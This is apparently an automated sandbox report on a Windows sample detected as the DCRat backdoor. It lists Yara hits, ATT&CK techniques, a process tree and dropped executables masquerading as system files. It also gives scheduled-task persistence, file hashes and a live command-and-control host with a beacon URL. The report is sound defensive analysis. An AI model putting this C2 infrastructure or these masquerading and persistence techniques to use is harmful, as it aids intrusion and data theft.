Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006ACF5 GetVersionExW,

            Stealing of Sensitive Information

Source: Yara match | File source: 00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.294012749.0000000002611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.370984322.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.328491076.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: chainsavesref.exe PID: 3372, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 3432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 2756, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5580, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: 00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.294012749.0000000002611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.370984322.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.328491076.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: chainsavesref.exe PID: 3372, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 3432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MrsUvRPGeImAhc.exe PID: 2756, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5580, type: MEMORYSTR
MITRE ATT&CK matrix, listed per tactic column (the number in front of a technique is the report's hit-count badge for that cell):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 11 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 11 Scripting; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: 221 Masquerading; 1 Disable or Modify Tools; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 11 Scripting; 2 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 121 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 37 System Information Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
Behavior Graph (ID: 679544, Sample: cDouNOFXle.exe, Startdate: 06/08/2022, Architecture: WINDOWS, Score: 100)

Start node signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 6 other signatures
Processes started from the start node: cDouNOFXle.exe; MrsUvRPGeImAhc.exe; explorer.exe; 25 other processes
cDouNOFXle.exe: dropped C:\...\chainsavesref.exe (PE32) and C:\...\et1pu6VAlkUOY7GuC90A.vbe (data); started wscript.exe
MrsUvRPGeImAhc.exe: network connection to a0702220.xsph.ru (141.8.195.65, 49779, 80, SPRINTHOSTRU, Russian Federation); signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
wscript.exe: started cmd.exe
cmd.exe: started chainsavesref.exe and conhost.exe
chainsavesref.exe: dropped C:\...\backgroundTaskHost.exe (PE32), C:\...\RuntimeBroker.exe (PE32), C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe (PE32) and 5 other malicious files; signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures

Source | Detection | Scanner | Label
cDouNOFXle.exe | 54% | Virustotal |
cDouNOFXle.exe | 40% | Metadefender |
cDouNOFXle.exe | 60% | ReversingLabs | ByteCode-MSIL.Backdoor.LightStone
cDouNOFXle.exe | 100% | Avira | VBS/Runner.VPG
cDouNOFXle.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Recovery\ShellExperienceHost.exe | 100% | Avira | HEUR/AGEN.1249330
C:\comproviderRuntimecommon\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1249330
C:\comproviderRuntimecommon\backgroundTaskHost.exe | 100% | Avira | HEUR/AGEN.1249330
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | 100% | Avira | HEUR/AGEN.1249330
C:\Recovery\winlogon.exe | 100% | Avira | HEUR/AGEN.1249330
C:\Recovery\explorer.exe | 100% | Avira | HEUR/AGEN.1249330
C:\comproviderRuntimecommon\chainsavesref.exe | 100% | Avira | HEUR/AGEN.1249330
C:\Recovery\conhost.exe | 100% | Avira | HEUR/AGEN.1249330
C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe | 100% | Avira | VBS/Runner.VPG
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | 100% | Avira | HEUR/AGEN.1249330
C:\Recovery\ShellExperienceHost.exe | 100% | Joe Sandbox ML |
C:\comproviderRuntimecommon\RuntimeBroker.exe | 100% | Joe Sandbox ML |
C:\comproviderRuntimecommon\backgroundTaskHost.exe | 100% | Joe Sandbox ML |
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | 100% | Joe Sandbox ML |
C:\Recovery\winlogon.exe | 100% | Joe Sandbox ML |
C:\Recovery\explorer.exe | 100% | Joe Sandbox ML |
C:\comproviderRuntimecommon\chainsavesref.exe | 100% | Joe Sandbox ML |
C:\Recovery\conhost.exe | 100% | Joe Sandbox ML |
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | 100% | Joe Sandbox ML |
C:\Recovery\ShellExperienceHost.exe | 55% | Virustotal |
C:\Recovery\ShellExperienceHost.exe | 70% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\conhost.exe | 55% | Virustotal |
C:\Recovery\conhost.exe | 70% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\explorer.exe | 55% | Virustotal |
C:\Recovery\explorer.exe | 70% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\winlogon.exe | 55% | Virustotal |
C:\Recovery\winlogon.exe | 70% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | 55% | Virustotal |
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | 70% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe | 70% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\comproviderRuntimecommon\RuntimeBroker.exe | 70% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\comproviderRuntimecommon\backgroundTaskHost.exe | 70% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\comproviderRuntimecommon\chainsavesref.exe | 70% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
Source | Detection | Scanner | Label
0.3.cDouNOFXle.exe.5528b46.0.unpack | 100% | Avira | VBS/Runner.VPG
0.3.cDouNOFXle.exe.5557b46.1.unpack | 100% | Avira | VBS/Runner.VPG
6.0.chainsavesref.exe.350000.0.unpack | 100% | Avira | HEUR/AGEN.1249330
            No Antivirus matches
Source | Detection | Scanner | Label
https://index.from.sh/pages/game.html | 0% | Virustotal |
https://index.from.sh/pages/game.html | 0% | Avira URL Cloud | safe
http://a0702220.xsph.ru8 | 0% | Avira URL Cloud | safe
http://a0702220.xsph.rux | 0% | Avira URL Cloud | safe
http://go.mic | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
a0702220.xsph.ru | 141.8.195.65 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://a0702220.xsph.ru/tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://cp.sprinthost.ru | MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://index.from.sh/pages/game.html | MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://a0702220.xsph.ru/tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf | MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://a0702220.xsph.ru8 | MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://a0702220.xsph.rux | MrsUvRPGeImAhc.exe, 00000017.00000002.362800777.00000000030FC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | chainsavesref.exe, 00000006.00000002.296875095.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://a0702220.xsph.ru | MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://go.mic | MrsUvRPGeImAhc.exe, 00000010.00000002.325485482.0000000001020000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cp.sprinthost.ru/auth/login | MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://a0702220.xsph.ru/ | MrsUvRPGeImAhc.exe, 00000017.00000002.362379963.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
141.8.195.65 | a0702220.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | false
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 679544
Start date and time: 2022-08-06 00:51:06 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 48s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: cDouNOFXle.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 42
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@34/22@1/1
                            EGA Information:
                            • Successful, ratio: 16.7%
                            HDC Information:
                            • Successful, ratio: 99.8% (good quality ratio 95%)
                            • Quality average: 78.7%
                            • Quality standard deviation: 28%
                            HCA Information:
                            • Successful, ratio: 72%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Adjust boot time
                            • Enable AMSI
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, winlogon.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                            • TCP Packets have been reduced to 100
                            • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, arc.msn.com
                            • Execution Graph export aborted for target MrsUvRPGeImAhc.exe, PID 2756 because it is empty
                            • Execution Graph export aborted for target MrsUvRPGeImAhc.exe, PID 3432 because it is empty
                            • Execution Graph export aborted for target chainsavesref.exe, PID 3372 because it is empty
                            • Execution Graph export aborted for target explorer.exe, PID 1820 because it is empty
                            • Execution Graph export aborted for target explorer.exe, PID 5580 because it is empty
                             • Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                             Time      Type             Description
                             00:52:16  Task Scheduler   Run new task: conhost path: "C:\Recovery\conhost.exe"
                             00:52:16  Task Scheduler   Run new task: conhostc path: "C:\Recovery\conhost.exe"
                             00:52:17  Task Scheduler   Run new task: MrsUvRPGeImAhcM path: "C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe"
                             00:52:19  Task Scheduler   Run new task: MrsUvRPGeImAhc path: "C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe"
                             00:52:19  Task Scheduler   Run new task: winlogonw path: "C:\Recovery\winlogon.exe"
                             00:52:22  Task Scheduler   Run new task: explorer path: "C:\Recovery\explorer.exe"
                             00:52:22  Task Scheduler   Run new task: explorere path: "C:\Recovery\explorer.exe"
                             00:52:23  Task Scheduler   Run new task: winlogon path: "C:\Recovery\winlogon.exe"
                             00:52:25  Task Scheduler   Run new task: backgroundTaskHost path: "C:\comproviderRuntimecommon\backgroundTaskHost.exe"
                             00:52:26  Task Scheduler   Run new task: backgroundTaskHostb path: "C:\comproviderRuntimecommon\backgroundTaskHost.exe"
                             00:52:26  Task Scheduler   Run new task: RuntimeBroker path: "C:\comproviderRuntimecommon\RuntimeBroker.exe"
                             00:52:26  Task Scheduler   Run new task: RuntimeBrokerR path: "C:\comproviderRuntimecommon\RuntimeBroker.exe"
                             00:52:28  Task Scheduler   Run new task: ShellExperienceHost path: "C:\Recovery\ShellExperienceHost.exe"
                             00:52:28  Task Scheduler   Run new task: ShellExperienceHostS path: "C:\Recovery\ShellExperienceHost.exe"
                             00:52:49  API Interceptor  2x Sleep call for process: MrsUvRPGeImAhc.exe modified
                            No context
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):837
                            Entropy (8bit):5.919202933432686
                            Encrypted:false
                            SSDEEP:12:InWMz/5YD5Cb8IvQXw9h7ZEIkpV+JgMOoEUQzyzTDESudWokCXd4zDCLHigCkrnq:IWTD5XEQaBwiJgMvCzWISKW2d4fgBw
                            MD5:A836B53C99726EFC79C466816D8D28B5
                            SHA1:31F73DA56CA51D71512CB8DD7305FACE255EF802
                            SHA-256:B851B82C5C0EADFE0A718DE04E0D01FB5BE7A536238724BC717987A2BFA873FA
                            SHA-512:055D417449537442EDD3F1014317B96B8D822B85C116E72A613E4A0074A32720C7D03CC5F3BEB2E8E627E4270D65DE7311AB4565D6B9D4749074309F7CB68398
                            Malicious:false
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):814
                            Entropy (8bit):5.896066697042415
                            Encrypted:false
                            SSDEEP:24:GDDqFMMEx3Qvm9wy2wUhpqQeGHOqGUQ3xS12:iOKMExA+REpugOoQ3cI
                            MD5:B4B5C242A0BBC225FA07D76D8AF6D4ED
                            SHA1:35707D7467D96BA0F392A69CB64BE4F4FC77766D
                            SHA-256:96E0DED81CF69A8BF874E6C66A14B708451EA5F7FDB0433C7F06747C7B09F48E
                            SHA-512:57BC8AAB4036D47A770E261D4AA83FCDD57B5A310B3ADBE16760E0734236F77B7A06FB047AD055025DFEEFC39FB2355A1684DE01542670DE44009AF5034CF284
                            Malicious:false
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                             • Antivirus: Virustotal, Detection: 55%
                            • Antivirus: ReversingLabs, Detection: 70%
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):374
                            Entropy (8bit):5.822060650367992
                            Encrypted:false
                            SSDEEP:6:O1YN7wg2PXOBG2z2WnfV/nH5NjgwJxXZIBVEynMto7KeRQ10iBDsBZGMWbn:O1YnmXOTVnH3k0xpIBVznMto7ZQ10cU0
                            MD5:BB5E9B0632879AE9B7B6F1D9FC353445
                            SHA1:B8B8DFF17AAFECD248153D958F41B00A09196238
                            SHA-256:3D14ABD2AE8018470375EF9F0D6515D9CDB83E1DA6B828693CDF1DB839EFCD1A
                            SHA-512:88B1AE97928387DA365C84D7C07FEACB982DDE4D2B209448CC53E55F0BFB264D580DE69955DEE4BD12DFBDFDF03F8CE227492518ED0E49C3684C9CF93563F69D
                            Malicious:false
                            Preview:xJDOqRskYofURDFwUsu9cGEux27KB1zIgtLFNy29Pj0RzImfyW448c4qESaxUijgyWxh29igzvt2Qx5pQcVo75KEzeA5XForATdcUEnyxYENsBaRWvh2M4j2MssX8mIuGC26TcULzh1i16WxEtimhwfFulQmWPzLPUHpId74aWDpDABQW4TPDgMThwMsMsyjrpThyqpkvoLLt0CtkAPc5kHsHyIWRPrshd7XrebqPtdZVBjrudIMcWoGikZAhTTg6coQ2oBFijNLHsXGPblxHfQKy1zGEaI6a7c2XSyFbCn2Jc8zNTvFrfYaMdcBz5BHbQvKPes6ngVF2XBV293upCO5iCq40xQgAfb2ryktlycKJTiybGIzCQ
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                             • Antivirus: Virustotal, Detection: 55%
                            • Antivirus: ReversingLabs, Detection: 70%
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                             • Antivirus: Virustotal, Detection: 55%
                            • Antivirus: ReversingLabs, Detection: 70%
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):318
                            Entropy (8bit):5.821678878981174
                            Encrypted:false
                            SSDEEP:6:cgA2F14JMlZwZdQGlGc9Pw5QwLicI+HCVr8VsPJWjCm5EwGoThjzYsiZLix:cgA2F14JMDGluxIX6uPY+rwGeUjZLM
                            MD5:E1D19D6C3F4BB41CB9125A86FB1E2583
                            SHA1:342577F1EEB903AE174478BEBBD2B307548CE64D
                            SHA-256:69806E929465780686EBF6EEC2D32D69BA2A0F19B5E89877E52CA15B6B035037
                            SHA-512:56E494BF9D702A0287F1DBA7AF288AF3359C13A4D85AC08C28D5E59C60845B94FDF0B4444515DC64D5DB8A6F754D2B488A6727DE0A1F18BCD4313309EC344017
                            Malicious:false
                            Preview:MAzYOEH2EeSX6dTFsT7pwOX2898kwmkJuHIgBB1e7v2xZ7AlHJWVgxh7n6ZOFhFc3ImyVxDrccsAWjcA9XcmQPn7jK3FlmZapa3RULQTGo2DEglDdYPsEcLofpPK48F0DRV6pLqxGJglXj2Dj0lNWqVNOPvp6FZIjBAwLoXRscl46kR5wLkEW2dW5IsaZA0AtYCVjF24cTe4FbRn703vfVvrhn1C662rmkLhi6VqSplCXjRe1EdjHEfYmUx6Oz8gbxRePtFBeMczttU8WWL1dSkhFw5NIZbdrFkkRwOH9cE4lqo3Azk2nGCJMuZdx1
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                             • Antivirus: Virustotal, Detection: 55%
                            • Antivirus: ReversingLabs, Detection: 70%
                            Process:C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1281
                            Entropy (8bit):5.367899416177239
                            Encrypted:false
                            SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
                            MD5:7115A3215A4C22EF20AB9AF4160EE8F5
                            SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
                            SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
                            SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
